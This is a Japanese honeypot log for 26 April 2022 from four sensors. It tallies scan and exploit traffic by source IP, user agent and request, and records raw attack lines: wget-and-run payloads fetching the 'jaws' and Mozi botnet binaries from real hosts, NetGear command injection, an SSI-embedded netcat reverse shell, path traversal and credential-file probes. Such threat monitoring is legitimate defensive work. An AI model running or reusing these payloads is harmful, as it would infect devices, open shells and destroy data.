ハニーポット(仮) 観測記録 2022/04/26分です。
特徴
共通
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
zgrabによるスキャン行為
/.awsへのスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
Location:JP
GPONルータの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 110.45.146.209/jaws; sh /tmp/jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
l9exploreによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget a.tigoinari.tk/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Axis製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Lkx-TraversalHttpPluginによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://183.151.113.181:33189/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:171 (前日比:99)
US:総アクセス数:82 (前日比:-6)
UK:総アクセス数:40 (前日比:-10)
SG:総アクセス数:194 (前日比:111)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 1.234.179.63 | South Korea |
| 3 | 3.144.238.218 | United States |
| 3 | 23.224.186.207 | United States |
| 1 | 34.150.1.217 | United States |
| 1 | 41.251.200.148 | Morocco |
| 1 | 45.12.3.26 | Ukraine |
| 1 | 45.134.225.16 | Germany |
| 1 | 51.15.76.60 | France |
| 1 | 63.214.171.26 | United States |
| 1 | 66.240.192.82 | United States |
| 2 | 74.208.212.159 | United States |
| 101 | 88.152.11.177 | Germany |
| 16 | 95.214.235.205 | Ukraine |
| 2 | 109.237.103.118 | Russia |
| 2 | 129.153.205.109 | United States |
| 15 | 135.125.244.48 | France |
| 2 | 157.245.70.127 | United States |
| 2 | 183.136.225.9 | China |
| 7 | 185.254.196.217 | Ukraine |
| 1 | 192.241.194.63 | United States |
| 1 | 192.241.219.67 | United States |
| 1 | 192.241.220.181 | United States |
| 1 | 192.241.222.151 | United States |
| 1 | 205.210.31.3 | United States |
| 3 | 213.226.123.30 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 3 | Go-http-client/1.1 |
| 1 | Hello, world |
| 3 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
| 45 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01\x01D\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 2 | \x16\x03\x01 |
||
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 45 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /manager/text/list |
HTTP/1.1 |
| 101 | GET | /phpmyadmin/ |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+110[.]45[.]146[.]209/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /yuuki?pp=env |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 5.62.20.17 | United Kingdom |
| 4 | 23.224.186.6 | United States |
| 1 | 39.86.60.114 | China |
| 1 | 40.78.147.68 | United States |
| 1 | 45.55.55.233 | United States |
| 2 | 45.155.204.146 | Russia |
| 11 | 51.79.29.48 | Canada |
| 1 | 54.70.248.115 | United States |
| 1 | 75.81.115.119 | United States |
| 1 | 103.95.13.145 | India |
| 2 | 109.237.103.118 | Russia |
| 1 | 120.86.252.132 | China |
| 1 | 123.4.84.193 | China |
| 22 | 143.198.136.88 | United States |
| 7 | 149.202.15.205 | France |
| 1 | 159.223.180.164 | United States |
| 1 | 162.142.125.222 | United States |
| 1 | 165.232.142.205 | United States |
| 1 | 179.43.167.122 | Panama |
| 1 | 180.112.224.240 | China |
| 9 | 185.254.196.223 | Ukraine |
| 1 | 192.241.213.122 | United States |
| 1 | 192.241.215.36 | United States |
| 1 | 192.241.219.66 | United States |
| 1 | 192.241.219.154 | United States |
| 1 | 192.241.220.32 | United States |
| 2 | 194.165.16.76 | Panama |
| 2 | 213.226.123.30 | Russia |
| 1 | 218.84.115.234 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 10 | - |
| 7 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Hello, world |
| 1 | Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis) |
| 2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 5 | Mozilla/5.0 zgrab/0.x |
| 17 | l9explore/1.3.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 2 | \x16\x03\x01 |
||
| 1 | CONNECT | leakix[.]net:443 |
HTTP/1.1 |
| 1 | GET | /.DS_Store |
HTTP/1.1 |
| 2 | GET | /.aws/credentials |
HTTP/1.1 |
| 1 | GET | /.env.bak |
HTTP/1.1 |
| 27 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.json |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /api/geojson?url=file:///etc/hosts |
HTTP/1.1 |
| 1 | GET | /api/search?folderIds=0 |
HTTP/1.1 |
| 1 | GET | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts |
HTTP/1.1 |
| 1 | GET | /config.json |
HTTP/1.1 |
| 1 | GET | /config/aws.yml |
HTTP/1.1 |
| 1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
| 1 | GET | /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application |
HTTP/1.1 |
| 2 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
| 1 | GET | /fuel/pages/select/ |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /idx_config/ |
HTTP/1.1 |
| 2 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /login.action |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /manager/text/list |
HTTP/1.1 |
| 1 | GET | /phpinfo.php |
HTTP/1.1 |
| 1 | GET | /phpinfo |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties |
HTTP/1.1 |
| 1 | GET | /server-status |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]4[.]84[.]193:54216/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//39[.]86[.]60[.]114:44328/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /telescope/requests |
HTTP/1.1 |
| 1 | GET | /v2/_catalog |
HTTP/1.1 |
| 1 | HEAD | / |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
| 1 | PUT | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 36.37.140.107 | Cambodia |
| 3 | 45.155.204.146 | Russia |
| 2 | 45.227.254.56 | Belize |
| 1 | 46.249.33.53 | Netherlands |
| 2 | 47.107.90.177 | China |
| 1 | 103.12.160.84 | Cambodia |
| 1 | 106.75.241.23 | China |
| 2 | 109.237.103.118 | Russia |
| 1 | 112.238.229.155 | China |
| 1 | 120.85.118.39 | China |
| 2 | 157.230.216.203 | United States |
| 1 | 179.43.167.122 | Panama |
| 1 | 182.121.126.223 | China |
| 5 | 185.142.236.35 | Seychelles |
| 1 | 192.241.216.130 | United States |
| 1 | 192.241.220.186 | United States |
| 1 | 192.241.221.49 | United States |
| 1 | 192.241.221.112 | United States |
| 1 | 192.241.222.127 | United States |
| 1 | 192.241.223.8 | United States |
| 2 | 193.124.7.9 | Czechia |
| 4 | 202.95.12.31 | Singapore |
| 1 | 205.210.31.10 | United States |
| 3 | 213.226.123.30 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 15 | - |
| 4 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 6 | Mozilla/5.0 zgrab/0.x |
| 2 | python-requests/2.27.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 2 | \x03 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 2 | \x16\x03\x01 |
||
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 1 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
| 1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
| 1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
| 3 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20193.124.7.9%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e |
HTTP/1.0\n |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /manager/text/list |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 2 | GET | /robots.txt |
HTTP/1.1 |
| 2 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
| 1 | HEAD | /BOEKJ/config.js |
HTTP/1.1 |
| 1 | HEAD | /platform/passport/captcha.html |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.55.53.144 | United States |
| 2 | 20.110.243.170 | United States |
| 2 | 20.122.1.236 | United States |
| 1 | 20.230.52.51 | United States |
| 1 | 27.220.180.253 | China |
| 1 | 40.78.147.68 | United States |
| 1 | 43.154.61.196 | Singapore |
| 3 | 45.155.204.146 | Russia |
| 2 | 45.227.254.26 | Belize |
| 1 | 47.224.44.98 | United States |
| 11 | 51.79.29.48 | Canada |
| 1 | 64.188.9.205 | United States |
| 2 | 74.81.32.5 | United States |
| 2 | 74.208.212.159 | United States |
| 1 | 89.248.165.24 | United Kingdom |
| 2 | 109.237.103.118 | Russia |
| 1 | 121.231.11.46 | China |
| 5 | 134.122.112.12 | United States |
| 2 | 157.230.216.203 | United States |
| 1 | 162.142.125.9 | United States |
| 1 | 163.172.57.53 | United Kingdom |
| 1 | 165.232.142.205 | United States |
| 1 | 167.94.145.58 | United States |
| 1 | 183.151.113.181 | China |
| 4 | 185.165.190.34 | Seychelles |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 192.241.212.117 | United States |
| 1 | 192.241.220.23 | United States |
| 1 | 192.241.221.53 | United States |
| 1 | 192.241.221.83 | United States |
| 1 | 192.241.221.158 | United States |
| 1 | 198.235.24.33 | United States |
| 4 | 213.226.123.30 | Russia |
| 125 | 217.146.87.194 | United Kingdom |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 17 | - |
| 3 | Go-http-client/1.1 |
| 2 | Hello, world |
| 1 | Lkx-TraversalHttpPlugin/0.0.1 (+https[:]//leakix[.]net/, +https[:]//twitter[.]com/HaboubiAnis) |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 126 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
| 28 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 5 | Mozilla/5.0 zgrab/0.x |
| 1 | Python-httplib2/0.18.1 (gzip) |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - |
||
| 1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
| 3 | \x03 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 1 | \x16\x03\x01\x02 |
||
| 2 | \x16\x03\x01 |
||
| 1 | CONNECT | leakix[.]net:443 |
HTTP/1.1 |
| 1 | GET | /.DS_Store |
HTTP/1.1 |
| 1 | GET | /.aws/credentials |
HTTP/1.1 |
| 26 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /.well-known/security.txt |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /admin/.git/config |
HTTP/1.1 |
| 2 | GET | /admin/ |
HTTP/1.1 |
| 1 | GET | /admin/config |
HTTP/1.1 |
| 1 | GET | /api/.git/config |
HTTP/1.1 |
| 1 | GET | /api/ |
HTTP/1.1 |
| 1 | GET | /api/config |
HTTP/1.1 |
| 1 | GET | /api |
HTTP/1.1 |
| 1 | GET | /app/.git/config |
HTTP/1.1 |
| 1 | GET | /app/ |
HTTP/1.1 |
| 1 | GET | /app/config |
HTTP/1.1 |
| 1 | GET | /app |
HTTP/1.1 |
| 1 | GET | /backend/.git/config |
HTTP/1.1 |
| 1 | GET | /backend/ |
HTTP/1.1 |
| 1 | GET | /backend/config |
HTTP/1.1 |
| 1 | GET | /backend |
HTTP/1.1 |
| 1 | GET | /backup/.git/config |
HTTP/1.1 |
| 1 | GET | /backup/ |
HTTP/1.1 |
| 1 | GET | /backup/config |
HTTP/1.1 |
| 1 | GET | /backup |
HTTP/1.1 |
| 1 | GET | /bak/.git/config |
HTTP/1.1 |
| 1 | GET | /bak/ |
HTTP/1.1 |
| 1 | GET | /bak/config |
HTTP/1.1 |
| 1 | GET | /bak |
HTTP/1.1 |
| 1 | GET | /cfg/.git/config |
HTTP/1.1 |
| 1 | GET | /cfg/ |
HTTP/1.1 |
| 1 | GET | /cfg/config |
HTTP/1.1 |
| 1 | GET | /cfg |
HTTP/1.1 |
| 1 | GET | /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts |
HTTP/1.1 |
| 1 | GET | /conf/.git/config |
HTTP/1.1 |
| 1 | GET | /conf/ |
HTTP/1.1 |
| 1 | GET | /conf/config |
HTTP/1.1 |
| 1 | GET | /conf |
HTTP/1.1 |
| 1 | GET | /config/.git/config |
HTTP/1.1 |
| 1 | GET | /config/ |
HTTP/1.1 |
| 1 | GET | /config/config |
HTTP/1.1 |
| 2 | GET | /config |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /cron/ |
HTTP/1.1 |
| 1 | GET | /cron |
HTTP/1.1 |
| 1 | GET | /data/.git/config |
HTTP/1.1 |
| 1 | GET | /data/ |
HTTP/1.1 |
| 1 | GET | /data/config |
HTTP/1.1 |
| 1 | GET | /data |
HTTP/1.1 |
| 1 | GET | /download/ |
HTTP/1.1 |
| 1 | GET | /download |
HTTP/1.1 |
| 1 | GET | /downloads/ |
HTTP/1.1 |
| 1 | GET | /downloads |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /files/ |
HTTP/1.1 |
| 1 | GET | /files |
HTTP/1.1 |
| 1 | GET | /git/.git/config |
HTTP/1.1 |
| 1 | GET | /git/ |
HTTP/1.1 |
| 1 | GET | /git/config |
HTTP/1.1 |
| 1 | GET | /git |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /inc/.git/config |
HTTP/1.1 |
| 1 | GET | /inc/ |
HTTP/1.1 |
| 1 | GET | /inc/config |
HTTP/1.1 |
| 1 | GET | /inc |
HTTP/1.1 |
| 1 | GET | /include/.git/config |
HTTP/1.1 |
| 1 | GET | /include/ |
HTTP/1.1 |
| 1 | GET | /include/config |
HTTP/1.1 |
| 1 | GET | /include |
HTTP/1.1 |
| 1 | GET | /includes/.git/config |
HTTP/1.1 |
| 1 | GET | /includes/ |
HTTP/1.1 |
| 1 | GET | /includes/config |
HTTP/1.1 |
| 1 | GET | /includes |
HTTP/1.1 |
| 2 | GET | /laravel/.env |
HTTP/1.1 |
| 1 | GET | /lib/.git/config |
HTTP/1.1 |
| 1 | GET | /lib/ |
HTTP/1.1 |
| 1 | GET | /lib/config |
HTTP/1.1 |
| 1 | GET | /lib |
HTTP/1.1 |
| 1 | GET | /libs/.git/config |
HTTP/1.1 |
| 1 | GET | /libs/ |
HTTP/1.1 |
| 1 | GET | /libs/config |
HTTP/1.1 |
| 1 | GET | /libs |
HTTP/1.1 |
| 1 | GET | /log/ |
HTTP/1.1 |
| 1 | GET | /log |
HTTP/1.1 |
| 1 | GET | /logs/ |
HTTP/1.1 |
| 1 | GET | /logs |
HTTP/1.1 |
| 1 | GET | /manager/html |
HTTP/1.1 |
| 1 | GET | /manager/text/list |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /rest/.git/config |
HTTP/1.1 |
| 1 | GET | /rest/ |
HTTP/1.1 |
| 1 | GET | /rest/config |
HTTP/1.1 |
| 1 | GET | /rest |
HTTP/1.1 |
| 1 | GET | /robots.txt |
HTTP/1.1 |
| 1 | GET | /service/.git/config |
HTTP/1.1 |
| 1 | GET | /service/ |
HTTP/1.1 |
| 1 | GET | /service/config |
HTTP/1.1 |
| 1 | GET | /service |
HTTP/1.1 |
| 1 | GET | /services/.git/config |
HTTP/1.1 |
| 1 | GET | /services/ |
HTTP/1.1 |
| 1 | GET | /services/config |
HTTP/1.1 |
| 1 | GET | /services |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]220[.]180[.]253:40740/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//183[.]151[.]113[.]181:33189/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /sitemap.xml |
HTTP/1.1 |
| 1 | GET | /source/.git/config |
HTTP/1.1 |
| 1 | GET | /source/ |
HTTP/1.1 |
| 1 | GET | /source/config |
HTTP/1.1 |
| 1 | GET | /source |
HTTP/1.1 |
| 1 | GET | /sources/.git/config |
HTTP/1.1 |
| 1 | GET | /sources/ |
HTTP/1.1 |
| 1 | GET | /sources/config |
HTTP/1.1 |
| 1 | GET | /sources |
HTTP/1.1 |
| 1 | GET | /src/.git/config |
HTTP/1.1 |
| 1 | GET | /src/ |
HTTP/1.1 |
| 1 | GET | /src/config |
HTTP/1.1 |
| 1 | GET | /src |
HTTP/1.1 |
| 1 | GET | /svc/.git/config |
HTTP/1.1 |
| 1 | GET | /svc/ |
HTTP/1.1 |
| 1 | GET | /svc/config |
HTTP/1.1 |
| 1 | GET | /svc |
HTTP/1.1 |
| 1 | GET | /temp/.git/config |
HTTP/1.1 |
| 1 | GET | /temp/ |
HTTP/1.1 |
| 1 | GET | /temp/config |
HTTP/1.1 |
| 1 | GET | /temp |
HTTP/1.1 |
| 1 | GET | /test/.git/config |
HTTP/1.1 |
| 1 | GET | /test/ |
HTTP/1.1 |
| 1 | GET | /test/config |
HTTP/1.1 |
| 1 | GET | /test |
HTTP/1.1 |
| 1 | GET | /tmp/.git/config |
HTTP/1.1 |
| 1 | GET | /tmp/ |
HTTP/1.1 |
| 1 | GET | /tmp/config |
HTTP/1.1 |
| 1 | GET | /tmp |
HTTP/1.1 |
| 1 | GET | /upload/ |
HTTP/1.1 |
| 1 | GET | /upload |
HTTP/1.1 |
| 1 | GET | /uploads/ |
HTTP/1.1 |
| 1 | GET | /uploads |
HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 1 | GET | /wallet/ |
HTTP/1.1 |
| 1 | GET | /wallet |
HTTP/1.1 |
| 1 | GET | /wallets/ |
HTTP/1.1 |
| 1 | GET | /wallets |
HTTP/1.1 |
| 1 | GET | /wp-content/ |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /dvr/cmd |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
| 1 | PUT | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
